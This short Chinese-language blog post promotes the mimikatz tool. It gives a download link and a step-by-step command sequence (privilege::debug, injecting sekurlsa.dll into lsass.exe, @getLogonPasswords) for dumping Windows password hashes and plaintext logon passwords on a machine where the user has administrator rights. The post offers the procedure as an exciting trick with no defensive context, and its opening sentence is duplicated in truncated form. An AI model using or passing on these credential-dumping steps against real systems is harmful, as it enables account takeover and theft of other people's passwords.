最近在网上突然找到一款工具,可直接获取windows操作系统的口令,不但可提取主机的hash至,并且出来的密码都是明文的,比较牛X,但是需要超级用户权限,具体如下:工具下载地址:http://blog
.
最近在网上突然找到一款工具,可直接获取windows操作系统的口令,不但可提取主机的hash至,并且出来的密码都是明文的,比较牛X,但是需要超级用户权限,具体如下:
工具下载地址:
http://blog.gentilkiwi.com/mimikatz
使用方法:
1. 运行程序:mimikatz.exe
2. 输入:privilege::debug
3. 输入:inject::process lsass.exe sekurlsa.dll
应该是将sekurlsa.dll 注入到lsass.exe 中
4. 输入:@getLogonPasswords
获取主机的hash值和当前用户的明文密码!强悍!
惊喜吧!
